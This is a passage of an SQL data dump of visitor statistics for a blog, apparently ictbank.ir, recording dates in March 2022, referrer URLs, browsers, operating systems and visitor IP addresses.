(19457,'2022-03-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.94.247.128','000',0,1,0),
(19458,'2022-03-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.129.217.138','000',0,1,0),
(19459,'2022-03-19','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.204','000',0,6,0),
(19460,'2022-03-19','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','188.138.1.68','000',0,2,0),
(19461,'2022-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.225.15','000',0,2,0),
(19462,'2022-03-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.165.200','000',0,2,0),
(19463,'2022-03-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(19464,'2022-03-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(19465,'2022-03-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(19466,'2022-03-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(19467,'2022-03-19','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','3.83.182.120','000',0,1,0),
(19468,'2022-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','15.235.9.75','000',0,1,0),
(19469,'2022-03-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(19470,'2022-03-20','http://wikisonnati.com/blog','Firefox','Windows','10.0',NULL,NULL,'','62.182.157.252','000',0,2,0),
(19471,'2022-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.154.226.166','000',0,1,0),
(19472,'2022-03-20','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.11','000',0,1,0),
(19473,'2022-03-20','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.66.49','000',0,1,0),
(19474,'2022-03-20','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.203','000',0,2,0),
(19475,'2022-03-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','104.222.43.32','000',0,1,0),
(19476,'2022-03-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','104.222.43.131','000',0,1,0),
(19477,'2022-03-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','192.30.83.143','000',0,1,0),
(19478,'2022-03-20','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.248.165.245','000',0,2,0),
(19479,'2022-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.30.121.226','000',0,1,0),
(19480,'2022-03-20','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','167.99.127.252','000',0,1,0),
(19481,'2022-03-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(19482,'2022-03-20','http://82.102.9.14/blog','Chrome','Android','9',NULL,NULL,'','221.130.37.133','000',0,1,0),
(19483,'2022-03-20','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','201.7.218.4','000',0,1,0),
(19484,'2022-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.13','000',0,2,0),
(19485,'2022-03-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(19486,'2022-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','92.205.12.20','000',0,1,0),
(19487,'2022-03-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(19488,'2022-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.86.144','000',0,1,0),
(19489,'2022-03-20','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','90.3.100.220','000',0,2,0),
(19490,'2022-03-20','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','89.46.223.134','000',0,1,0),
(19491,'2022-03-20','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','3.101.68.35','000',0,1,0),
(19492,'2022-03-20','http://wikisonnati.com/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','52.53.227.151','000',0,4,0),
(19493,'2022-03-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(19494,'2022-03-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.219.2','000',0,1,0),
(19495,'2022-03-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.221.200','000',0,1,0),
(19496,'2022-03-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19497,'2022-03-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(19498,'2022-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(19499,'2022-03-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(19500,'2022-03-20','http://82.102.9.14/blog','Chrome','Android','7.0',NULL,NULL,'','221.130.37.213','000',0,1,0),
(19501,'2022-03-20','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','142.117.178.226','000',0,1,0),
(19502,'2022-03-20','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','138.201.60.47','000',0,1,0),
(19503,'2022-03-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(19504,'2022-03-21','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','103.86.158.242','000',0,2,0),
(19505,'2022-03-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','171.25.193.77','000',0,1,0),
(19506,'2022-03-21','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','159.242.227.64','000',0,5,0),
(19507,'2022-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.12','000',0,2,0),
(19508,'2022-03-21','http://wikisonnati.com/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.35.128','000',0,2,0),
(19509,'2022-03-21','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.50','000',0,1,0),
(19510,'2022-03-21','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.96.176','000',0,2,0),
(19511,'2022-03-21','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.7','000',0,1,0),
(19512,'2022-03-21','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.67','000',0,2,0),
(19513,'2022-03-21','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.100.19','000',0,1,0),
(19514,'2022-03-21','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.100.18','000',0,1,0),
(19515,'2022-03-21','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.167','000',0,2,0),
(19516,'2022-03-21','http://www.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.51.49','000',0,1,0),
(19517,'2022-03-21','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.4','000',0,2,0),
(19518,'2022-03-21','http://82.102.9.14/blog','Chrome','Android','10.0',NULL,NULL,'','221.130.37.149','000',0,1,0),
(19519,'2022-03-21','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','39.64.241.181','000',0,1,0),
(19520,'2022-03-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(19521,'2022-03-21','http://mail.design-arena.ir/blog','Chrome','Android','6.0',NULL,NULL,'','124.223.197.100','000',0,4,0),
(19522,'2022-03-21','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.67.47','000',0,1,0),
(19523,'2022-03-21','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(19524,'2022-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.58.187.30','000',0,1,0),
(19525,'2022-03-21','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','23.248.163.254','000',0,3,0),
(19526,'2022-03-21','http://82.102.9.14/blog','Chrome','Android','7.0',NULL,NULL,'','221.130.37.133','000',0,1,0),
(19527,'2022-03-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','164.68.96.84','000',0,1,0),
(19528,'2022-03-21','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(19529,'2022-03-21','https://www.bing.com','Chrome','Windows','6.3',NULL,NULL,'','165.227.75.108','000',0,1,0),
(19530,'2022-03-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(19531,'2022-03-21','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','44.200.178.204','000',0,2,0),
(19532,'2022-03-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(19533,'2022-03-21','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','51.254.199.11','000',0,1,0),
(19534,'2022-03-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.107.112','000',0,1,0),
(19535,'2022-03-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(19536,'2022-03-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(19537,'2022-03-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19538,'2022-03-21','http://www.ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','58.17.6.9','000',0,2,0),
(19539,'2022-03-21','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.248.165.245','000',0,2,0),
(19540,'2022-03-21','http://www.ictbank.ir/blog','Chrome','OS X','10.11.3',NULL,NULL,'','159.89.129.233','000',0,33,0),
(19541,'2022-03-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.106.123.81','000',0,2,0),
(19542,'2022-03-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,18,0),
(19543,'2022-03-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.87.68','000',0,1,0),
(19544,'2022-03-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(19545,'2022-03-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.95.147.9','000',0,2,0),
(19546,'2022-03-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(19547,'2022-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.254.34.42','000',0,1,0),
(19548,'2022-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.53','000',0,1,0),
(19549,'2022-03-22','http://ictbank.ir','Chrome','Windows','6.3',NULL,NULL,'','185.220.100.252','000',0,2,0),
(19550,'2022-03-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','85.209.43.31','000',0,2,0),
(19551,'2022-03-22','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','69.28.85.201','000',0,1,0),
(19552,'2022-03-22','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','144.202.51.238','000',0,1,0),
(19553,'2022-03-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.42','000',0,2,0),
(19554,'2022-03-22','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','149.28.125.80','000',0,1,0),
(19555,'2022-03-22','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','69.28.84.200','000',0,1,0),
(19556,'2022-03-22','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','85.194.237.20','000',0,1,0),
(19557,'2022-03-22','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','188.165.87.101','000',0,1,0),
(19558,'2022-03-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(19559,'2022-03-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,4,0),
(19560,'2022-03-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','88.80.187.183','000',0,2,0),
(19561,'2022-03-22','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','50.112.28.235','000',0,1,0),
(19562,'2022-03-22','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','90.103.217.80','000',0,1,0),
(19563,'2022-03-22','http://ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','157.245.77.246','000',0,1,0),
(19564,'2022-03-22','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','20.132.6.254','000',0,1,0),
(19565,'2022-03-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.177','000',0,1,0),
(19566,'2022-03-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19567,'2022-03-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(19568,'2022-03-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(19569,'2022-03-22','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','35.166.11.146','000',0,2,0),
(19570,'2022-03-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(19571,'2022-03-23','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.196','000',0,2,0),
(19572,'2022-03-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,1,0),
(19573,'2022-03-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,14,0),
(19574,'2022-03-23','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','6.1',NULL,NULL,'','176.106.247.22','000',0,2,0),
(19575,'2022-03-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.20','000',0,2,0),
(19576,'2022-03-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.243','000',0,2,0),
(19577,'2022-03-23','http://www.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.227.166.127','000',0,1,0),
(19578,'2022-03-23','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','18.215.124.11','000',0,1,0),
(19581,'2022-03-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','176.58.115.217','000',0,2,0),
(19582,'2022-03-23','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.248.165.245','000',0,2,0),
(19583,'2022-03-23','http://ictbank.ir/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','46.161.11.11','000',0,1,0),
(19584,'2022-03-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.187.110','000',0,1,0),
(19585,'2022-03-23','https://www.google.com/','Chrome','Android','11',NULL,NULL,'','157.48.157.27','000',0,1,0),
(19586,'2022-03-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','165.225.61.66','000',0,2,0),
(19587,'2022-03-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.104.160.147','000',0,1,0),
(19588,'2022-03-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.161.157.122','000',0,1,0),
(19589,'2022-03-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(19590,'2022-03-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.46.55','000',0,1,0),
(19591,'2022-03-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,2,0),
(19592,'2022-03-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.158.182.226','000',0,1,0),
(19593,'2022-03-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','165.225.211.46','000',0,1,0),
(19594,'2022-03-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','91.90.123.41','000',0,1,0),
(19595,'2022-03-24','http://ictbank.ir/blog','Chrome','Android','5.0',NULL,NULL,'','83.49.38.163','000',0,1,0),
(19596,'2022-03-24','http://ictbank.ir/blog','Chrome','Android','5.0',NULL,NULL,'','45.6.32.50','000',0,1,0),
(19597,'2022-03-24','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','143.198.25.95','000',0,1,0),
(19598,'2022-03-24','http://ictbank.ir/blog/category/os/','Chrome','Windows','10.0',NULL,NULL,'','189.56.198.214','000',0,1,0),
(19599,'2022-03-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(19600,'2022-03-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.88','000',0,2,0),
(19601,'2022-03-24','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,3,0),
(19602,'2022-03-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.11','000',0,2,0),
(19603,'2022-03-24','http://82.102.9.14:80/blog','Chrome','Android','6.0',NULL,NULL,'','82.156.185.91','000',0,5,0),
(19604,'2022-03-24','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','134.58.253.20','000',0,3,0),
(19605,'2022-03-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.224.155','000',0,2,0),
(19606,'2022-03-24','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.220.100.241','000',0,1,0),
(19607,'2022-03-24','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','197.248.20.58','000',0,1,0),
(19608,'2022-03-24','https://www.ecosia.org/','Chrome','Windows','10.0',NULL,NULL,'','163.116.163.140','000',0,1,0),
(19609,'2022-03-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','62.210.28.188','000',0,2,0),
(19610,'2022-03-24','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.72','000',0,10,0),
(19611,'2022-03-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.131.215','000',0,1,0),
(19612,'2022-03-24','https://www.google.com/','Chrome','Android','11',NULL,NULL,'','86.55.97.247','000',0,3,0),
(19613,'2022-03-24','http://82.102.9.14/blog','Chrome','Android','10.0',NULL,NULL,'','221.130.37.134','000',0,1,0),
(19614,'2022-03-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(19615,'2022-03-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.225.58.99','000',0,2,0),
(19616,'2022-03-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.162.103.72','000',0,2,0),
(19617,'2022-03-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.69.58.136','000',0,1,0),
(19618,'2022-03-25','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.248.165.245','000',0,2,0),
(19619,'2022-03-25','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','103.99.3.216','000',0,3,0),
(19620,'2022-03-25','https://www.google.com/','Chrome','Android','9',NULL,NULL,'','103.143.98.121','000',0,6,0),
(19621,'2022-03-25','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.200','000',0,3,0),
(19623,'2022-03-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.218.70','000',0,1,0),
(19624,'2022-03-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19625,'2022-03-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.11','000',0,2,0),
(19626,'2022-03-25','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.207','000',0,2,0),
(19627,'2022-03-25','https://www.google.com/','Chrome','Android','9',NULL,NULL,'','114.79.54.166','000',0,5,0),
(19628,'2022-03-25','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.194','000',0,4,0),
(19629,'2022-03-25','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','69.28.84.203','000',0,1,0),
(19630,'2022-03-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.88.58.56','000',0,1,0),
(19631,'2022-03-25','https://www.google.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','94.21.176.22','000',0,1,0),
(19632,'2022-03-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.217.121','000',0,2,0),
(19633,'2022-03-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(19634,'2022-03-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.220.182','000',0,1,0),
(19635,'2022-03-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(19636,'2022-03-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(19637,'2022-03-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.66','000',0,2,0),
(19638,'2022-03-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.110.186','000',0,1,0),
(19639,'2022-03-25','http://ictbank.ir/blog/index.php/tag/server/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.8','000',0,7,0),
(19640,'2022-03-25','https://www.google.com','Chrome','Windows','10.0',NULL,NULL,'','167.114.173.203','000',0,39,0),
(19641,'2022-03-25','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','176.74.192.85','000',0,2,0),
(19642,'2022-03-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.227.75.164','000',0,2,0),
(19643,'2022-03-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.103.252.104','000',0,2,0),
(19644,'2022-03-26','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','186.82.85.239','000',0,1,0),
(19645,'2022-03-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.44','000',0,1,0),
(19646,'2022-03-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','190.228.29.221','000',0,1,0),
(19647,'2022-03-26','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.71','000',0,1,0),
(19648,'2022-03-26','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','203.194.107.102','000',0,1,0),
(19649,'2022-03-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.216','000',0,2,0),
(19650,'2022-03-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.62','000',0,1,0),
(19651,'2022-03-26','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.248.165.245','000',0,2,0),
(19652,'2022-03-26','https://www.google.com/','Chrome','Android','11',NULL,NULL,'','46.51.53.160','000',0,3,0),
(19653,'2022-03-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(19654,'2022-03-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(19655,'2022-03-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19656,'2022-03-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(19657,'2022-03-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(19658,'2022-03-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,2,0),
(19659,'2022-03-26','http://ictbank.ir/blog/index.php/category/os/linxu/oraclelinux/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.144','000',0,7,0),
(19660,'2022-03-26','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.64.49','000',0,1,0),
(19661,'2022-03-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.68.11.203','000',0,1,0),
(19662,'2022-03-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.254.69.184','000',0,1,0),
(19663,'2022-03-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,3,0),
(19664,'2022-03-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19665,'2022-03-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','40.121.110.133','000',0,1,0),
(19666,'2022-03-27','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','194.190.179.79','000',0,1,0),
(19667,'2022-03-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.151.184.111','000',0,1,0),
(19668,'2022-03-27','http://ictbank.ir/blog/index.php/tag/mysql/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.6','000',0,7,0),
(19669,'2022-03-27','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','194.110.115.18','000',0,2,0),
(19670,'2022-03-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','201.49.234.33','000',0,17,0),
(19671,'2022-03-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.143','000',0,2,0),
(19672,'2022-03-27','http://ictbank.ir/blog/index.php/tag/scsi/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.8','000',0,7,0),
(19673,'2022-03-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(19674,'2022-03-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(19675,'2022-03-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(19676,'2022-03-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(19677,'2022-03-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(19678,'2022-03-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(19679,'2022-03-27','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','176.9.111.189','000',0,1,0),
(19680,'2022-03-27','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.23.211','000',0,1,0),
(19681,'2022-03-27','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','89.46.223.134','000',0,2,0),
(19682,'2022-03-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.252.87.23','000',0,1,0),
(19683,'2022-03-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.252.87.18','000',0,1,0),
(19684,'2022-03-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(19685,'2022-03-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,1,0),
(19686,'2022-03-28','https://www.bing.com','Chrome','Linux','Unknown',NULL,NULL,'','149.28.135.57','000',0,1,0),
